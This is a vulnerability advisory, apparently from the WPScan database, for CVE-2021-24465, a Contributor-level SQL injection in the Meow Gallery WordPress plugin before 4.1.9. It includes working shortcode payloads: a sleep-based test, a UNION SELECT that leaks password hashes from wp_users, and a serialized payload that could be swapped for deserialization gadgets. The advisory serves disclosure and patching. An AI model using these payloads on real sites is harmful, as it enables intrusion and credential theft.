WordPress Plugin Vulnerabilities

Meow Gallery < 4.1.9 - Contributor+ SQL Injection

Description

The plugin does not sanitise, validate or escape the ids attribute of its gallery shortcode (available for users as low as Contributor) before using it in an SQL statement, leading to an authenticated SQL Injection issue. The injection also allows the returned values to be manipulated in a way that could lead to data disclosure and arbitrary objects to be deserialized.

Proof of Concept

Simple PoC to prove the SQLi: add the following shortcode in a page/post with a role as low as contributor, then preview/view it and note the 10s delay

[gallery layout="cascade" ids="1) AND (select*from(select(sleep(10)))a"]

-- Reporter PoC:

This SQL injection allows two things: 1) disclosure of arbitrary contents in SQL tables, and 2) deserialization of arbitrary objects.

To prepare for data disclosure, we first need to get serialized version of _wp_attachment_metadata. Of course if you are here for deserialization this can be replaced with serialization gadgets.

This is the JSON I used for this:

{"width":1,"height":1,"file":"a.png","sizes":{"medium":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"},"thumbnail":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"}},"image_meta":{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0","keywords":[]}}

b64 = eyJ3aWR0aCI6MSwiaGVpZ2h0IjoxLCJmaWxlIjoiYS5wbmciLCJzaXplcyI6eyJtZWRpdW0iOnsiZmlsZSI6ImEucG5nIiwid2lkdGgiOjEsImhlaWdodCI6MSwibWltZS10eXBlIjoiaW1hZ2UvcG5nIn0sInRodW1ibmFpbCI6eyJmaWxlIjoiYS5wbmciLCJ3aWR0aCI6MSwiaGVpZ2h0IjoxLCJtaW1lLXR5cGUiOiJpbWFnZS9wbmcifX0sImltYWdlX21ldGEiOnsiYXBlcnR1cmUiOiIwIiwiY3JlZGl0IjoiIiwiY2FtZXJhIjoiIiwiY2FwdGlvbiI6IiIsImNyZWF0ZWRfdGltZXN0YW1wIjoiMCIsImNvcHlyaWdodCI6IiIsImZvY2FsX2xlbmd0aCI6IjAiLCJpc28iOiIwIiwic2h1dHRlcl9zcGVlZCI6IjAiLCJ0aXRsZSI6IiIsIm9yaWVudGF0aW9uIjoiMCIsImtleXdvcmRzIjpbXX19

Which can be base64_encode(serialize(json_decode(PAYLOAD))) ed to get the serialized payload.

Shortcode payload for leaking user's password hashes:
[gallery layout="cascade" ids="1) UNION SELECT id,user_pass,FROM_BASE64('BASE64ED_PAYLOAD_SEE_ABOVE') FROM wp_users WHERE id IN (1,2,3,4"]


This should produce a HTML like (base64ed):
<div class="mgl-row mgl-layout-1-o" data-cascade-layout="o"><div class="mgl-box a"><figure class="mgl-item">
	<div class="mgl-icon">
		<div class="mgl-img-container">
												</div>
	</div>
		<figcaption class="mgl-caption">
			<p>LEAKED PASSWORD HASH/</p>
	</figcaption>
	</figure>
</div></div>

Affects Plugins

Plugin icon
meow-gallery
Fixed in 4.1.9

References

CVE
CVE-2021-24465

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
08dbe202-0136-4502-87e7-5e984dc27b16

Timeline

Publicly Published
2021-09-02 (about 2 years ago)
Added
2021-09-02 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2023-08-30
Title
WP Job Portal < 2.0.6 - Unauthenticated SQLi
Published
2023-09-25
Title
WPSchoolPress < 2.2.5 - Teacher+ SQLi
Published
2024-04-09
Title
AIKit <= 4.14.1 - Authenticated (Contributor+) SQL Injection
Published
2024-03-28
Title
WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting <= 1.12.9 - Authenticated (Subscriber+) SQL Injection
Published
2014-08-01
Title
st_newsletter - Remote SQL Injection